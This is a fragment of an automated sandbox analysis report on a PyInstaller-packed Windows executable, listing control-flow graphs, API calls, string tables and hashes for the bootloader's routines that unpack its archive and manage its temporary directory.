                                                                                                                                                                                                                                                                                                                        control_flow_graph 62 7ff6ba3a1000-7ff6ba3a3806 call 7ff6ba3afe18 call 7ff6ba3afe20 call 7ff6ba3ac850 call 7ff6ba3b53f0 call 7ff6ba3b5484 call 7ff6ba3a36b0 76 7ff6ba3a3814-7ff6ba3a3836 call 7ff6ba3a1950 62->76 77 7ff6ba3a3808-7ff6ba3a380f 62->77 83 7ff6ba3a391b-7ff6ba3a3931 call 7ff6ba3a45c0 76->83 84 7ff6ba3a383c-7ff6ba3a3856 call 7ff6ba3a1c80 76->84 78 7ff6ba3a3c97-7ff6ba3a3cb2 call 7ff6ba3ac550 77->78 90 7ff6ba3a3933-7ff6ba3a3960 call 7ff6ba3a7f90 83->90 91 7ff6ba3a396a-7ff6ba3a397f call 7ff6ba3a2710 83->91 87 7ff6ba3a385b-7ff6ba3a389b call 7ff6ba3a8830 84->87 95 7ff6ba3a38c1-7ff6ba3a38cc call 7ff6ba3b4f30 87->95 96 7ff6ba3a389d-7ff6ba3a38a3 87->96 103 7ff6ba3a3962-7ff6ba3a3965 call 7ff6ba3b004c 90->103 104 7ff6ba3a3984-7ff6ba3a39a6 call 7ff6ba3a1c80 90->104 99 7ff6ba3a3c8f 91->99 111 7ff6ba3a38d2-7ff6ba3a38e1 call 7ff6ba3a8830 95->111 112 7ff6ba3a39fc-7ff6ba3a3a2a call 7ff6ba3a8940 call 7ff6ba3a89a0 * 3 95->112 100 7ff6ba3a38af-7ff6ba3a38bd call 7ff6ba3a89a0 96->100 101 7ff6ba3a38a5-7ff6ba3a38ad 96->101 99->78 100->95 101->100 103->91 113 7ff6ba3a39b0-7ff6ba3a39b9 104->113 120 7ff6ba3a39f4-7ff6ba3a39f7 call 7ff6ba3b4f30 111->120 121 7ff6ba3a38e7-7ff6ba3a38ed 111->121 138 7ff6ba3a3a2f-7ff6ba3a3a3e call 7ff6ba3a8830 112->138 113->113 116 7ff6ba3a39bb-7ff6ba3a39d8 call 7ff6ba3a1950 113->116 116->87 130 7ff6ba3a39de-7ff6ba3a39ef call 7ff6ba3a2710 116->130 120->112 126 7ff6ba3a38f0-7ff6ba3a38fc 121->126 127 7ff6ba3a38fe-7ff6ba3a3903 126->127 128 7ff6ba3a3905-7ff6ba3a3908 126->128 127->126 127->128 128->120 131 7ff6ba3a390e-7ff6ba3a3916 call 7ff6ba3b4f30 128->131 130->99 131->138 141 7ff6ba3a3b45-7ff6ba3a3b53 138->141 142 7ff6ba3a3a44-7ff6ba3a3a47 138->142 143 7ff6ba3a3a67 141->143 144 7ff6ba3a3b59-7ff6ba3a3b5d 141->144 142->141 145 7ff6ba3a3a4d-7ff6ba3a3a50 142->145 146 7ff6ba3a3a6b-7ff6ba3a3a90 call 7ff6ba3b4f30 143->146 144->146 147 7ff6ba3a3b14-7ff6ba3a3b17 145->147 148 7ff6ba3a3a56-7ff6ba3a3a5a 145->148 157 7ff6ba3a3a92-7ff6ba3a3aa6 call 7ff6ba3a8940 146->157 158 7ff6ba3a3aab-7ff6ba3a3ac0 146->158 150 7ff6ba3a3b2f-7ff6ba3a3b40 call 7ff6ba3a2710 147->150 151 7ff6ba3a3b19-7ff6ba3a3b1d 147->151 148->147 149 7ff6ba3a3a60 148->149 149->143 159 7ff6ba3a3c7f-7ff6ba3a3c87 150->159 151->150 153 7ff6ba3a3b1f-7ff6ba3a3b2a 151->153 153->146 157->158 161 7ff6ba3a3ac6-7ff6ba3a3aca 158->161 162 7ff6ba3a3be8-7ff6ba3a3bfa call 7ff6ba3a8830 158->162 159->99 164 7ff6ba3a3ad0-7ff6ba3a3ae8 call 7ff6ba3b5250 161->164 165 7ff6ba3a3bcd-7ff6ba3a3be2 call 7ff6ba3a1940 161->165 170 7ff6ba3a3c2e 162->170 171 7ff6ba3a3bfc-7ff6ba3a3c02 162->171 175 7ff6ba3a3b62-7ff6ba3a3b7a call 7ff6ba3b5250 164->175 176 7ff6ba3a3aea-7ff6ba3a3b02 call 7ff6ba3b5250 164->176 165->161 165->162 177 7ff6ba3a3c31-7ff6ba3a3c40 call 7ff6ba3b4f30 170->177 173 7ff6ba3a3c1e-7ff6ba3a3c2c 171->173 174 7ff6ba3a3c04-7ff6ba3a3c1c 171->174 173->177 174->177 184 7ff6ba3a3b87-7ff6ba3a3b9f call 7ff6ba3b5250 175->184 185 7ff6ba3a3b7c-7ff6ba3a3b80 175->185 176->165 186 7ff6ba3a3b08-7ff6ba3a3b0f 176->186 187 7ff6ba3a3d41-7ff6ba3a3d63 call 7ff6ba3a44e0 177->187 188 7ff6ba3a3c46-7ff6ba3a3c4a 177->188 199 7ff6ba3a3ba1-7ff6ba3a3ba5 184->199 200 7ff6ba3a3bac-7ff6ba3a3bc4 call 7ff6ba3b5250 184->200 185->184 186->165 197 7ff6ba3a3d71-7ff6ba3a3d82 call 7ff6ba3a1c80 187->197 198 7ff6ba3a3d65-7ff6ba3a3d6f call 7ff6ba3a4630 187->198 190 7ff6ba3a3c50-7ff6ba3a3c5f call 7ff6ba3a90e0 188->190 191 7ff6ba3a3cd4-7ff6ba3a3ce6 call 7ff6ba3a8830 188->191 208 7ff6ba3a3c61 190->208 209 7ff6ba3a3cb3-7ff6ba3a3cb6 call 7ff6ba3a8660 190->209 203 7ff6ba3a3d35-7ff6ba3a3d3c 191->203 204 7ff6ba3a3ce8-7ff6ba3a3ceb 191->204 213 7ff6ba3a3d87-7ff6ba3a3d96 197->213 198->213 199->200 200->165 221 7ff6ba3a3bc6 200->221 210 7ff6ba3a3c68 call 7ff6ba3a2710 203->210 204->203 211 7ff6ba3a3ced-7ff6ba3a3d10 call 7ff6ba3a1c80 204->211 208->210 220 7ff6ba3a3cbb-7ff6ba3a3cbd 209->220 222 7ff6ba3a3c6d-7ff6ba3a3c77 210->222 228 7ff6ba3a3d12-7ff6ba3a3d26 call 7ff6ba3a2710 call 7ff6ba3b4f30 211->228 229 7ff6ba3a3d2b-7ff6ba3a3d33 call 7ff6ba3b4f30 211->229 218 7ff6ba3a3dc4-7ff6ba3a3dda call 7ff6ba3a9390 213->218 219 7ff6ba3a3d98-7ff6ba3a3d9f 213->219 234 7ff6ba3a3de8-7ff6ba3a3e04 SetDllDirectoryW 218->234 235 7ff6ba3a3ddc 218->235 219->218 224 7ff6ba3a3da1-7ff6ba3a3da5 219->224 226 7ff6ba3a3cbf-7ff6ba3a3cc6 220->226 227 7ff6ba3a3cc8-7ff6ba3a3ccf 220->227 221->165 222->159 224->218 230 7ff6ba3a3da7-7ff6ba3a3dbe SetDllDirectoryW LoadLibraryExW 224->230 226->210 227->213 228->222 229->213 230->218 238 7ff6ba3a3f01-7ff6ba3a3f08 234->238 239 7ff6ba3a3e0a-7ff6ba3a3e19 call 7ff6ba3a8830 234->239 235->234 242 7ff6ba3a3f0e-7ff6ba3a3f15 238->242 243 7ff6ba3a4008-7ff6ba3a4010 238->243 250 7ff6ba3a3e32-7ff6ba3a3e3c call 7ff6ba3b4f30 239->250 251 7ff6ba3a3e1b-7ff6ba3a3e21 239->251 242->243 246 7ff6ba3a3f1b-7ff6ba3a3f25 call 7ff6ba3a33c0 242->246 247 7ff6ba3a4012-7ff6ba3a402f PostMessageW GetMessageW 243->247 248 7ff6ba3a4035-7ff6ba3a4067 call 7ff6ba3a36a0 call 7ff6ba3a3360 call 7ff6ba3a3670 call 7ff6ba3a6fc0 call 7ff6ba3a6d70 243->248 246->222 260 7ff6ba3a3f2b-7ff6ba3a3f3f call 7ff6ba3a90c0 246->260 247->248 262 7ff6ba3a3ef2-7ff6ba3a3efc call 7ff6ba3a8940 250->262 263 7ff6ba3a3e42-7ff6ba3a3e48 250->263 254 7ff6ba3a3e23-7ff6ba3a3e2b 251->254 255 7ff6ba3a3e2d-7ff6ba3a3e2f 251->255 254->255 255->250 269 7ff6ba3a3f41-7ff6ba3a3f5e PostMessageW GetMessageW 260->269 270 7ff6ba3a3f64-7ff6ba3a3fa0 call 7ff6ba3a8940 call 7ff6ba3a89e0 call 7ff6ba3a6fc0 call 7ff6ba3a6d70 call 7ff6ba3a88e0 260->270 262->238 263->262 268 7ff6ba3a3e4e-7ff6ba3a3e54 263->268 272 7ff6ba3a3e5f-7ff6ba3a3e61 268->272 273 7ff6ba3a3e56-7ff6ba3a3e58 268->273 269->270 308 7ff6ba3a3fa5-7ff6ba3a3fa7 270->308 272->238 276 7ff6ba3a3e67-7ff6ba3a3e83 call 7ff6ba3a6dc0 call 7ff6ba3a7340 272->276 273->276 277 7ff6ba3a3e5a 273->277 289 7ff6ba3a3e8e-7ff6ba3a3e95 276->289 290 7ff6ba3a3e85-7ff6ba3a3e8c 276->290 277->238 293 7ff6ba3a3eaf-7ff6ba3a3eb9 call 7ff6ba3a71b0 289->293 294 7ff6ba3a3e97-7ff6ba3a3ea4 call 7ff6ba3a6e00 289->294 292 7ff6ba3a3edb-7ff6ba3a3ef0 call 7ff6ba3a2a50 call 7ff6ba3a6fc0 call 7ff6ba3a6d70 290->292 292->238 306 7ff6ba3a3ec4-7ff6ba3a3ed2 call 7ff6ba3a74f0 293->306 307 7ff6ba3a3ebb-7ff6ba3a3ec2 293->307 294->293 305 7ff6ba3a3ea6-7ff6ba3a3ead 294->305 305->292 306->238 319 7ff6ba3a3ed4 306->319 307->292 311 7ff6ba3a3ff5-7ff6ba3a4003 call 7ff6ba3a1900 308->311 312 7ff6ba3a3fa9-7ff6ba3a3fbf call 7ff6ba3a8ed0 call 7ff6ba3a88e0 308->312 311->222 312->311 323 7ff6ba3a3fc1-7ff6ba3a3fd6 312->323 319->292 324 7ff6ba3a3ff0 call 7ff6ba3a2a50 323->324 325 7ff6ba3a3fd8-7ff6ba3a3feb call 7ff6ba3a2710 call 7ff6ba3a1900 323->325 324->311 325->222
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                                                                                        • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5769df13d4cb34b5a81c5f9880665c6c37022f6ebf483ec7a09b1a9e68fcb9e4
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33326A26E0CBA291FF199B29D8553BD66A2AF44780F8440B6DF5DC32D6EF2CE559C300

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 538 7ff6ba3c6964-7ff6ba3c69d7 call 7ff6ba3c6698 541 7ff6ba3c69f1-7ff6ba3c69fb call 7ff6ba3b8520 538->541 542 7ff6ba3c69d9-7ff6ba3c69e2 call 7ff6ba3b4ee8 538->542 548 7ff6ba3c6a16-7ff6ba3c6a7f CreateFileW 541->548 549 7ff6ba3c69fd-7ff6ba3c6a14 call 7ff6ba3b4ee8 call 7ff6ba3b4f08 541->549 547 7ff6ba3c69e5-7ff6ba3c69ec call 7ff6ba3b4f08 542->547 561 7ff6ba3c6d32-7ff6ba3c6d52 547->561 552 7ff6ba3c6a81-7ff6ba3c6a87 548->552 553 7ff6ba3c6afc-7ff6ba3c6b07 GetFileType 548->553 549->547 558 7ff6ba3c6ac9-7ff6ba3c6af7 GetLastError call 7ff6ba3b4e7c 552->558 559 7ff6ba3c6a89-7ff6ba3c6a8d 552->559 555 7ff6ba3c6b09-7ff6ba3c6b44 GetLastError call 7ff6ba3b4e7c CloseHandle 553->555 556 7ff6ba3c6b5a-7ff6ba3c6b61 553->556 555->547 572 7ff6ba3c6b4a-7ff6ba3c6b55 call 7ff6ba3b4f08 555->572 564 7ff6ba3c6b63-7ff6ba3c6b67 556->564 565 7ff6ba3c6b69-7ff6ba3c6b6c 556->565 558->547 559->558 566 7ff6ba3c6a8f-7ff6ba3c6ac7 CreateFileW 559->566 570 7ff6ba3c6b72-7ff6ba3c6bc7 call 7ff6ba3b8438 564->570 565->570 571 7ff6ba3c6b6e 565->571 566->553 566->558 576 7ff6ba3c6bc9-7ff6ba3c6bd5 call 7ff6ba3c68a0 570->576 577 7ff6ba3c6be6-7ff6ba3c6c17 call 7ff6ba3c6418 570->577 571->570 572->547 576->577 583 7ff6ba3c6bd7 576->583 584 7ff6ba3c6c19-7ff6ba3c6c1b 577->584 585 7ff6ba3c6c1d-7ff6ba3c6c5f 577->585 586 7ff6ba3c6bd9-7ff6ba3c6be1 call 7ff6ba3baac0 583->586 584->586 587 7ff6ba3c6c81-7ff6ba3c6c8c 585->587 588 7ff6ba3c6c61-7ff6ba3c6c65 585->588 586->561 589 7ff6ba3c6d30 587->589 590 7ff6ba3c6c92-7ff6ba3c6c96 587->590 588->587 592 7ff6ba3c6c67-7ff6ba3c6c7c 588->592 589->561 590->589 593 7ff6ba3c6c9c-7ff6ba3c6ce1 CloseHandle CreateFileW 590->593 592->587 595 7ff6ba3c6ce3-7ff6ba3c6d11 GetLastError call 7ff6ba3b4e7c call 7ff6ba3b8660 593->595 596 7ff6ba3c6d16-7ff6ba3c6d2b 593->596 595->596 596->589
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                                                                                        • Instruction ID: d2f1252c068806c6d85274bc4632117b0a975a79953561aa522fd67421a244c7
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40C1CF36B28B5286EB10CFA9C8906AC3B61FB49B98B415275DF1ED7795EF38D491C300

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A842B
                                                                                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84AE
                                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84CD
                                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84DB
                                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84EC
                                                                                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNELBASE(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84F5
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                                                                                                        • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                                                                                        • Instruction ID: d097f9422ff17ccd52add64778dbe7a2ad092627c8b647c71697cb2f7b283298
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3416521A0CA6685EE709F68E4491BE6362FB94755F400272EF9DC36D4EF3CD545C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1227d9f2ab5e5c76a0d82599c0af93e2b57c6a6d221941aecb0d24f7cfe87dc5
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97F0C822A1874586FB608F68F49876E7790AB84364F040335DFAED26D4DF3CD048CB00

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 331 7ff6ba3a1950-7ff6ba3a198b call 7ff6ba3a45c0 334 7ff6ba3a1c4e-7ff6ba3a1c72 call 7ff6ba3ac550 331->334 335 7ff6ba3a1991-7ff6ba3a19d1 call 7ff6ba3a7f90 331->335 340 7ff6ba3a19d7-7ff6ba3a19e7 call 7ff6ba3b06d4 335->340 341 7ff6ba3a1c3b-7ff6ba3a1c3e call 7ff6ba3b004c 335->341 346 7ff6ba3a19e9-7ff6ba3a1a03 call 7ff6ba3b4f08 call 7ff6ba3a2910 340->346 347 7ff6ba3a1a08-7ff6ba3a1a24 call 7ff6ba3b039c 340->347 345 7ff6ba3a1c43-7ff6ba3a1c4b 341->345 345->334 346->341 353 7ff6ba3a1a45-7ff6ba3a1a5a call 7ff6ba3b4f28 347->353 354 7ff6ba3a1a26-7ff6ba3a1a40 call 7ff6ba3b4f08 call 7ff6ba3a2910 347->354 361 7ff6ba3a1a7b-7ff6ba3a1afc call 7ff6ba3a1c80 * 2 call 7ff6ba3b06d4 353->361 362 7ff6ba3a1a5c-7ff6ba3a1a76 call 7ff6ba3b4f08 call 7ff6ba3a2910 353->362 354->341 373 7ff6ba3a1b01-7ff6ba3a1b14 call 7ff6ba3b4f44 361->373 362->341 376 7ff6ba3a1b35-7ff6ba3a1b4e call 7ff6ba3b039c 373->376 377 7ff6ba3a1b16-7ff6ba3a1b30 call 7ff6ba3b4f08 call 7ff6ba3a2910 373->377 383 7ff6ba3a1b6f-7ff6ba3a1b8b call 7ff6ba3b0110 376->383 384 7ff6ba3a1b50-7ff6ba3a1b6a call 7ff6ba3b4f08 call 7ff6ba3a2910 376->384 377->341 390 7ff6ba3a1b9e-7ff6ba3a1bac 383->390 391 7ff6ba3a1b8d-7ff6ba3a1b99 call 7ff6ba3a2710 383->391 384->341 390->341 395 7ff6ba3a1bb2-7ff6ba3a1bb9 390->395 391->341 397 7ff6ba3a1bc1-7ff6ba3a1bc7 395->397 398 7ff6ba3a1be0-7ff6ba3a1bef 397->398 399 7ff6ba3a1bc9-7ff6ba3a1bd6 397->399 398->398 400 7ff6ba3a1bf1-7ff6ba3a1bfa 398->400 399->400 401 7ff6ba3a1c0f 400->401 402 7ff6ba3a1bfc-7ff6ba3a1bff 400->402 403 7ff6ba3a1c11-7ff6ba3a1c24 401->403 402->401 404 7ff6ba3a1c01-7ff6ba3a1c04 402->404 405 7ff6ba3a1c26 403->405 406 7ff6ba3a1c2d-7ff6ba3a1c39 403->406 404->401 407 7ff6ba3a1c06-7ff6ba3a1c09 404->407 405->406 406->341 406->397 407->401 408 7ff6ba3a1c0b-7ff6ba3a1c0d 407->408 408->403
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A7F90: _fread_nolock.LIBCMT ref: 00007FF6BA3A803A
                                                                                                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF6BA3A1A1B
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6BA3A1B6A), ref: 00007FF6BA3A295E
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                                                                        • Opcode ID: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0f13b9b46475006238ca34a1eb1ae64f015f556f94893fcc7f2a56475438f961
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A819471A0CA9686EF60DB2CD4402BD63A2EF44784F444576EF8DC7796EE3CE5858740

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
